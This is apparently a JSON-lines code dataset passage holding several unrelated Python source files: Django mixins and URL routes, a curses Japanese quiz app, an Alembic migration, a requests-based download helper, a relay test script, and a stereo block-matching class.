"line_number": 7, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "8827158314", "text": "from django.db.models import F\n\nfrom api.eligibility_criteria.models import CriteriaBlock, CriteriaBlockConnector, FundEligibilityCriteria\n\n\nclass CriteriaBlockPositionUpdateMixin:\n @staticmethod\n def get_auto_generated_next_block(criteria_block: CriteriaBlock):\n criteria_blocks_qs = CriteriaBlock.objects.filter(criteria=criteria_block.criteria)\n user_documents_block = criteria_blocks_qs.filter(\n is_user_documents_step=True\n ).first()\n if user_documents_block:\n return user_documents_block\n\n final_step_block = criteria_blocks_qs.filter(is_final_step=True).first()\n return final_step_block\n\n def get_next_block(self, criteria_block: CriteriaBlock):\n later_blocks = self.get_later_blocks(criteria_block=criteria_block)\n next_block = later_blocks.first()\n\n if not next_block:\n next_block = self.get_auto_generated_next_block(criteria_block=criteria_block)\n\n return next_block\n\n @staticmethod\n def get_block_by_position(criteria: FundEligibilityCriteria, position: int):\n return CriteriaBlock.objects.filter(\n criteria=criteria,\n position=position\n ).first()\n\n @staticmethod\n def get_previous_block(criteria_block: CriteriaBlock):\n criteria_blocks_qs = CriteriaBlock.objects.filter(criteria=criteria_block.criteria)\n previous_block = criteria_blocks_qs.filter(\n position__lt=criteria_block.position\n ).order_by('-position').first()\n\n if not previous_block:\n previous_block = criteria_blocks_qs.filter(is_country_selector=True).first()\n return previous_block\n\n @staticmethod\n def get_later_blocks(criteria_block):\n return CriteriaBlock.objects.filter(\n criteria=criteria_block.criteria,\n position__gt=criteria_block.position\n ).order_by('position')\n\n def decrement_later_blocks_position(self, criteria_block: CriteriaBlock):\n self.get_later_blocks(criteria_block=criteria_block).update(position=F('position') - 1)\n\n def increment_later_blocks_position(self, criteria_block: CriteriaBlock):\n self.get_later_blocks(criteria_block=criteria_block).update(position=F('position') + 1)\n\n @staticmethod\n def delete_block_connectors(criteria_block):\n criteria_block.block_connected_to.all().delete()\n\n @staticmethod\n def connect_blocks(from_block: CriteriaBlock, to_block: CriteriaBlock):\n if not (from_block and to_block):\n return\n CriteriaBlockConnector.objects.create(\n from_block=from_block,\n to_block=to_block,\n condition='AND'\n )\n", "repo_name": "tayyabsaleem7756/jobtest", "sub_path": "backend/retail_market/api/eligibility_criteria/services/admin/criteria_block_update_mixin.py", "file_name": "criteria_block_update_mixin.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 8, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 9, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 9, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 19, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.FundEligibilityCriteria", "line_number": 29, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 30, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 36, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 37, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 48, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.F", "line_number": 54, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.F", "line_number": 57, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 64, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector", "line_number": 67, "usage_type": "name"}]}
+{"seq_id": "19185802201", "text": "# Created by BaiJiFeiLong@gmail.com at 2020/5/14 18:51\n\nfrom PySide2 import QtWidgets\n\nfrom ppledigester import log_utils\nfrom ppledigester.common import translator\n\n\nclass DigesterWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.logger = log_utils.get_logger(\"MainWindow\")\n self.resize(600, 400)\n self.logger.info(\"Window resize to 600x400\")\n self.statusBar().showMessage(translator.translate(\"DRAG_TIP\"))\n self.logger.info(\"The tip in status bar is shown.\")\n", "repo_name": "baijifeilong/pple-digester", "sub_path": "ppledigester/digester_window.py", "file_name": "digester_window.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide2.QtWidgets.QMainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "ppledigester.log_utils.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "ppledigester.log_utils", "line_number": 12, "usage_type": "name"}, {"api_name": "ppledigester.common.translator.translate", "line_number": 15, "usage_type": "call"}, {"api_name": "ppledigester.common.translator", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "32776134118", "text": "# Writing Game Mode:\n#\n# \n# \n# \n# \n# \n# \n# \n# \n# \n# \n\n\nimport curses\nimport random\n\nfrom src.utils.enums import Topic, ReturnTo, GameMode, MenuOption\nfrom src.utils.colors import Color\nfrom src.utils.japanese import Character\nfrom src.utils.question import QuestionGenerator, Question\nfrom src.curses_menu import SelectionMenu, Menu, TextMenuItem, ButtonMenuItem, ProgressBar, ExtendingText, draw_header\nfrom src .routes.summary import summary_route\n\n\n\ndef challenge_route(stdscr, topic: Topic, game_mode: GameMode, characters: list[Character]):\n height, width = stdscr.getmaxyx()\n\n # Subwindowing\n header_win = stdscr.derwin(5, width, 0, 0)\n progress_win = stdscr.derwin(1, width, 6, 0)\n question_no_win = stdscr.derwin(1, width, 8, 0)\n question_win = stdscr.derwin(2, width, 10, 0)\n menu_win = stdscr.derwin(5, width, 13, 0)\n answer_win = stdscr.derwin(4, width, 18, 0)\n prompt_win = stdscr.derwin(4, width, 23, 0)\n\n # CLI Loop\n return_value = ReturnTo.CHALLENGE\n\n while return_value >= ReturnTo.CHALLENGE:\n stdscr.clear()\n stdscr.refresh()\n\n characters_copy_shuffled: list[Character] = [*characters]\n random.shuffle(characters_copy_shuffled)\n\n # Initialize QuestionGenerator. Pass in the copy of characters array,\n # Do not pass in original copy because the player might want to try again later\n question_gen = QuestionGenerator(\n topic,\n game_mode,\n characters_copy_shuffled\n )\n\n # Progress initialization\n progress_bar = ProgressBar.preset_shade(\n progress_win,\n maximum=len(characters),\n text_color=Color.YELLOW | curses.A_BOLD\n )\n\n # header\n title = 'Writing 书 写' if game_mode == GameMode.WRITING else \\\n 'Recognition 辨 识' if game_mode == GameMode.RECOGNITION else \\\n 'Mixed 混 合'\n draw_header(\n header_win,\n f\"✰♫♪•*¨·٠•●♥✿ ▁▁▂▂▃▃▅▅▆▆▇▇ {title} ▇▇▆▆▅▅▃▃▂▂▁▁ ✿♥●•٠·¨*•♪♫✰\",\n text_color=Color.RED\n )\n\n\n # Question Loop\n for i, question in enumerate(question_gen):\n # Progress bar update\n progress_bar.update(i + 1)\n\n # Clear the windows before question number animates (blocking)\n menu_win.clear()\n menu_win.refresh()\n question_win.clear()\n question_win.refresh()\n answer_win.clear()\n answer_win.refresh()\n\n # Question number\n ExtendingText(\n question_no_win,\n f'Question {i+1}',\n delay=0.05,\n text_color=Color.BLUE | curses.A_BOLD\n ).run()\n\n # Question\n question_win.addstr( question.question, curses.A_BOLD )\n question_win.refresh()\n\n # Menu - Enclose in a loop to avoid redrawing the progress bar & questions\n # The question handlers return either True or False.\n # True - Continue to next question (Next iteration of for loop)\n # False - User selected \"Quit\". Continue to summary.\n if question.game_mode == GameMode.WRITING:\n if not writing_question_handler(question, menu_win, answer_win, prompt_win):\n break\n else:\n if not recognition_question_handler(question, menu_win, answer_win, prompt_win):\n break\n\n return_value = summary_route(stdscr, question_gen)\n return return_value\n\n\n\n\n\n\n# Handles display and input for a GameMode.WRITING question\n# Returns FALSE if the user selects to QUIT; True if user selects to proceed\ndef writing_question_handler(\n question: Question,\n menu_win,\n answer_win,\n prompt_win\n):\n # Prompt window\n prompt_win.clear()\n prompt_win.addstr(\n \"[Use UP/DOWN arrow to change selection.]\\n\"\n \"[Use ENTER to select.]\\n\",\n Color.GREEN | curses.A_BOLD\n )\n prompt_win.refresh()\n\n # Menu handling\n menu = SelectionMenu(\n menu_win,\n ['Done. Proceed', 'Peek answer', 'Quit'],\n highlight_color=Color.CYAN\n )\n\n while True:\n value = menu.run()\n # Proceed\n if value == 0:\n return True\n # Peek answer\n elif value == 1:\n question.peeked = True\n answer_win.clear()\n answer_win.addstr(f\"Answer: ({question.answer} )\")\n answer_win.refresh()\n else:\n return False\n\n\n\n\n\n# Handles display and input for a GameMode.RECOGNITION question\n# Returns FALSE if the user selects to QUIT; True if user selects to proceed\ndef recognition_question_handler(\n question: Question,\n menu_win,\n answer_win,\n prompt_win\n):\n # Prompt window\n prompt_win.clear()\n prompt_win.addstr(\n \"[Use UP/DOWN arrow to change selection.]\\n\"\n \"[Use ENTER to select.]\\n\"\n \"[Type in the romaji, BACKSPACE to delete, and ENTER to proceed]\",\n Color.GREEN | curses.A_BOLD\n )\n prompt_win.refresh()\n\n # Menu handling\n menu = Menu(menu_win)\n menu.add_menu_item('0', TextMenuItem.factory(\n 'Enter the romaji: ',\n return_on_enter=True,\n highlight_color=Color.CYAN\n ))\n menu.add_menu_item('1', ButtonMenuItem.factory(\n 'Peek Answer',\n lambda: MenuOption.PEEK_ANS,\n highlight_color=Color.CYAN\n ))\n menu.add_menu_item('2', ButtonMenuItem.factory(\n 'Quit',\n lambda: MenuOption.CANCEL,\n highlight_color=Color.CYAN\n ))\n\n while True:\n value = menu.run()\n # Peek answer\n if value == MenuOption.PEEK_ANS:\n question.peeked = True\n answer_win.clear()\n answer_win.addstr(f\"Answer: ({question.answer} )\")\n answer_win.refresh()\n # Quit\n elif value == MenuOption.CANCEL: return False\n # Check answer, show the correct one and ask to press any key before proceeding.\n else:\n question.player_ans = value\n\n answer_win.clear()\n answer_win.addstr(f\"Your answer is: \")\n answer_win.addstr(value, curses.A_BOLD)\n\n if value == question.answer:\n answer_win.addstr(\"\\nYou answered correctly!\", Color.GREEN | curses.A_BOLD)\n else:\n answer_win.addstr(f\"\\nThat is incorrect. Answer: ({question.answer} )\", Color.RED | curses.A_BOLD)\n\n answer_win.addstr(f'\\n\\nPress any key to continue...', Color.YELLOW | curses.A_BOLD)\n answer_win.refresh()\n answer_win.getch()\n return True\n", "repo_name": "AdmiJW/JapaneseMemorizer", "sub_path": "src/routes/challenge.py", "file_name": "challenge.py", "file_ext": "py", "file_size_in_byte": 6866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.utils.enums.Topic", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.enums.GameMode", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.japanese.Character", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.enums.ReturnTo.CHALLENGE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "src.utils.enums.ReturnTo", "line_number": 40, "usage_type": "name"}, {"api_name": "src.utils.enums.ReturnTo.CHALLENGE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "src.utils.enums.ReturnTo", "line_number": 42, "usage_type": "name"}, {"api_name": "src.utils.japanese.Character", "line_number": 46, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "src.utils.question.QuestionGenerator", "line_number": 51, "usage_type": "call"}, {"api_name": "src.curses_menu.ProgressBar.preset_shade", "line_number": 58, "usage_type": "call"}, {"api_name": "src.curses_menu.ProgressBar", "line_number": 58, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.YELLOW", "line_number": 61, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 61, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 61, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode.WRITING", "line_number": 65, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 65, "usage_type": "name"}, {"api_name": "src.utils.enums.GameMode.RECOGNITION", "line_number": 66, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 66, "usage_type": "name"}, {"api_name": "src.curses_menu.draw_header", "line_number": 68, "usage_type": "call"}, {"api_name": "src.utils.colors.Color.RED", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 71, "usage_type": "name"}, {"api_name": "src.curses_menu.ExtendingText", "line_number": 89, "usage_type": "call"}, {"api_name": "src.utils.colors.Color.BLUE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 93, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 93, "usage_type": "attribute"}, {"api_name": "curses.A_BOLD", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode.WRITING", "line_number": 104, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 104, "usage_type": "name"}, {"api_name": "src.routes.summary.summary_route", "line_number": 111, "usage_type": "call"}, {"api_name": "src.utils.question.Question", "line_number": 122, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 132, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 132, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 132, "usage_type": "attribute"}, {"api_name": "src.curses_menu.SelectionMenu", "line_number": 137, "usage_type": "call"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 140, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 140, "usage_type": "name"}, {"api_name": "src.utils.question.Question", "line_number": 164, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 175, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 175, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 175, "usage_type": "attribute"}, {"api_name": "src.curses_menu.Menu", "line_number": 180, "usage_type": "call"}, {"api_name": "src.curses_menu.TextMenuItem.factory", "line_number": 181, "usage_type": "call"}, {"api_name": "src.curses_menu.TextMenuItem", "line_number": 181, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 184, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 184, "usage_type": "name"}, {"api_name": "src.curses_menu.ButtonMenuItem.factory", "line_number": 186, "usage_type": "call"}, {"api_name": "src.curses_menu.ButtonMenuItem", "line_number": 186, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.PEEK_ANS", "line_number": 188, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 188, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 189, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 189, "usage_type": "name"}, {"api_name": "src.curses_menu.ButtonMenuItem.factory", "line_number": 191, "usage_type": "call"}, {"api_name": "src.curses_menu.ButtonMenuItem", "line_number": 191, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.CANCEL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 193, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 194, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 194, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.PEEK_ANS", "line_number": 200, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 200, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.CANCEL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 206, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 213, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 216, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 216, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 216, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.RED", "line_number": 218, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 218, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 218, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.YELLOW", "line_number": 220, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 220, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 220, "usage_type": "attribute"}]}
+{"seq_id": "38123079401", "text": "\"\"\"Remove unnecessary fields\n\nRevision ID: 213734b12f44\nRevises: 80c172946a90\nCreate Date: 2018-09-08 11:08:47.168451\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = \"213734b12f44\"\ndown_revision = \"80c172946a90\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"project\", \"project_coemail\")\n op.drop_column(\"project\", \"project_creator\")\n op.drop_column(\"project\", \"project_cremail\")\n op.drop_column(\"project\", \"project_contact\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"project\",\n sa.Column(\"project_contact\", mysql.VARCHAR(length=120), nullable=True),\n )\n op.add_column(\n \"project\", sa.Column(\"project_cremail\", mysql.VARCHAR(length=45), nullable=True)\n )\n op.add_column(\n \"project\", sa.Column(\"project_creator\", mysql.VARCHAR(length=45), nullable=True)\n )\n op.add_column(\n \"project\", sa.Column(\"project_coemail\", mysql.VARCHAR(length=45), nullable=True)\n )\n # ### end Alembic commands ###\n", "repo_name": "qlands/FormShare", "sub_path": "alembic/versions/213734b12f44_remove_unnecessary_fields.py", "file_name": "213734b12f44_remove_unnecessary_fields.py", "file_ext": "py", "file_size_in_byte": 1246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.drop_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 35, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "34380764956", "text": "import logging\nimport os\nfrom typing import Optional\n\nimport requests\n\nLOG = logging.getLogger(__name__)\n\n\nclass DownloadError(Exception):\n \"\"\"Represents an error during the download of a file.\n \"\"\"\n\n\ndef download_file(url: str, dest: str) -> None:\n \"\"\"Downloads a file from a remote host into the local filesystem.\n\n Supported protocols are:\n * HTTP\n * HTTPS\n\n Examples\n --------\n >>> download_file(\n 'http://localhost/file.txt', '/home/user/my-file.txt'\n )\n >>> download_file(\n 'https://user@pass:localhost/file.txt, '/home/user/my-file.txt'\n )\n\n :param url: The URL where the file is at.\n :type url: str\n :param dest: Path where the file is going to be downloaded at. Must\n contain name of the file.\n :type dest: str\n :raise DownloadError: If the download failed.\n \"\"\"\n LOG.debug('Creating path to: %s', dest)\n\n os.makedirs(os.path.dirname(dest), exist_ok=True)\n\n LOG.info(\"Downloading file from: '%s'\", url)\n\n with requests.get(url, stream=True) as request:\n if not request.ok:\n raise DownloadError(\n f'Download failed with: {request.status_code}\\n'\n f'{request.text}'\n )\n\n LOG.debug('Saving to: %s', dest)\n\n with open(dest, 'wb') as file:\n for chunk in request.iter_content(chunk_size=8 * 1024):\n file.write(chunk)\n\n\ndef download_into_memory(url: str,\n session: Optional[requests.Session] = None\n ) -> str:\n \"\"\"Downloads the contents of a URL into memory, leaving the filesystem\n untouched.\n\n Supported protocols are:\n * HTTP\n * HTTPS\n\n .. doctest::\n >>> download_into_memory('http://localhost/file.txt')\n\n :param url: URL to download.\n :param session: Session used to perform request. This function will not\n close the session, that task is up to the caller.\n :return: Contents of the page.\n :raise DownloadError: If the download failed.\n \"\"\"\n LOG.info(\"Downloading file from: '%s'\", url)\n\n request = session.get(url) if session else requests.get(url)\n\n if not request.ok:\n raise DownloadError(\n f'Download failed with: {request.status_code}\\n'\n f'{request.text}'\n )\n\n return request.content.decode()\n", "repo_name": "RedHatCRE/cibyl", "sub_path": "kernel/tools/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 59, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 59, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "26165203571", "text": "import configparser\n\nfrom waveshare_defs import WaveshareDef\nfrom relaycontrolmain import WaveshareRelayController\nimport time\n\nif __name__ == \"__main__\":\n\n # read in the global app config\n config = configparser.ConfigParser()\n config.read('testcfg.cfg')\n\n serial_port = config.get(\"DEFAULT\", \"serial_port\")\n\n default_states_str = config.get(\"DEFAULT\", \"default_relay_states\")\n\n # ensure we can convert to channel int\n print(int(WaveshareDef.CH1.value))\n\n print(WaveshareDef.from_channel_def(1))\n\n # initialize the WaveshareRelayController class\n relay_controller = WaveshareRelayController(serial_port)\n\n # connect the serial port\n relay_controller.connect()\n\n # turn off all the relays\n relay_controller.set_default_state()\n time.sleep(1.0)\n\n # iterate through all the channels and turn each one on\n for ch in WaveshareDef:\n relay_controller.set_channel_on(ch)\n time.sleep(0.5)\n\n # iterate through all the channels and turn each one off\n for ch in WaveshareDef:\n relay_controller.set_channel_off(ch)\n time.sleep(0.5)\n\n", "repo_name": "ElDuderino/WaveshareRelayControl", "sub_path": "tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "configparser.ConfigParser", "line_number": 10, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef.CH1", "line_number": 18, "usage_type": "attribute"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 18, "usage_type": "name"}, {"api_name": "waveshare_defs.WaveshareDef.from_channel_def", "line_number": 20, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 20, "usage_type": "name"}, {"api_name": "relaycontrolmain.WaveshareRelayController", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 38, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "13820753260", "text": "import numpy as np\nimport cv2\nimport math\n\n\nclass BlockMatcher:\n def __init__(self, window_size,max_disparity):\n self.window_size=window_size\n self.window_half_size=math.ceil(self.window_size/2)\n self.max_disparity=max_disparity\n self.scaler=255/max_disparity #scale factor\n\n def compute(self,left_image,right_image,transform_method, match_method):\n assert left_image.shape==right_image.shape\n self.height,self.width=left_image.shape\n left=self.__get_tranformer(transform_method)(left_image)\n right=self.__get_tranformer(transform_method)(right_image)\n disparity=self.__get_matcher(match_method)(left,right)\n\n return disparity\n\n def __get_tranformer(self,method):\n if method==\"rank\":\n return self.__rank_transform\n else:\n raise NotImplemented\n\n def __get_matcher(self,method):\n if method==\"sse\":\n return self.__sse_match\n else:\n raise NotImplemented \n\n def __rank_transform(self,image):\n result=np.zeros((self.height,self.width))\n \n for i in range(self.height-self.window_size+1):\n for j in range(self.width-self.window_size+1):\n anchor=image[i+self.window_half_size,j+self.window_half_size] \n value=(image[i:i+self.window_size,j:j+self.window_size]> anchor).sum() \n result[i+self.window_half_size,j+self.window_half_size]=value\n\n return result\n\n def __sse_match(self,left,right):\n result=np.zeros((self.height,self.width))\n #sum of square error\n for i in range(self.height-self.window_size+1):\n for j in range(self.width-self.window_size+1):\n sse=float('inf')\n best_disparity=0\n for d in range(self.max_disparity+1):\n if (j-d<0):\n continue\n left_block=left[i:i+self.window_size,j:j+self.window_size]\n right_block=right[i:i+self.window_size,j-d:j-d+self.window_size]\n sse_compute=((left_block-right_block)*(left_block-right_block)).sum()\n if (sse_compute /ingredients\",\n views.IngredientCreateView.as_view(),\n name=\"new-ingredient\",\n ),\n path(\n \"recipes/public\",\n views.RecipeListPublicView.as_view(),\n name=\"recipe-list-public\",\n ),\n path(\"recipes/\", views.RecipeDetailView.as_view(), name=\"recipe-detail\"),\n path(\"recipes//copy\", views.RecipeCopyView.as_view(), name=\"recipe-copy\"),\n path(\"admin/users\", views.UserListAdminView.as_view(), name=\"user-list\"),\n path(\n \"mealplan///\",\n views.MealPlanView.as_view(),\n name=\"mealplan\",\n ),\n path(\n \"recipes//publish\",\n views.RecipePublishView.as_view(),\n name=\"recipe-publish\",\n ),\n path(\"auth/\", include(\"djoser.urls\")),\n path(\"auth/\", include(\"djoser.urls.authtoken\")),\n]\n", "repo_name": "Momentum-Team-14/example-django-recipes", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1057, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 31, "usage_type": "call"}]}
